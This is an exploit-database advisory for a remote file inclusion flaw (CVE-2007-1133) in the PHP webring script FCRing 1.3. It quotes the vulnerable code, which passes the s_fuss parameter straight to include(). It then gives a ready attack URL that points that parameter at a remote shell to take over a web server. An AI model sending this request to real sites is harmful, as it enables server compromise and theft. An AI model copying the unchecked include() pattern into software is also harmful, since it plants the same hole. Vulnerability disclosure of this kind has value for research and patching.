[] NeoSense

FCRing 1.31 - 'fcring.php?s_fuss' Remote File Inclusion

Author: kezzap66345
type: webapps
platform: php
port: 
date_added: 2007-02-22 
date_updated:  
verified: 1 
codes: OSVDB-33802;CVE-2007-1133 
tags: 
aliases:  
screenshot_url:  
application_url: 

FCRing 1.3 Webringskript

*****************
Found by kezzap66345 *
*****************
Script:
http://www.scripter.ch/start.php?id=41.18.9&pos=fcring&title=FCRing%201.3
*****************
ERROR:


 if($s_fuss != "")
  include($s_fuss);      <<< rfi coded


**************************************************************************************
RFI:

http://SITE.com/path/fcring.php?s_fuss=[SHELL]


**************************************************************************************
kezzap66345[at]hotmail[dot]com

******thanx=x0r0n*str0ke*shika********************************************************

# milw0rm.com [2007-02-23]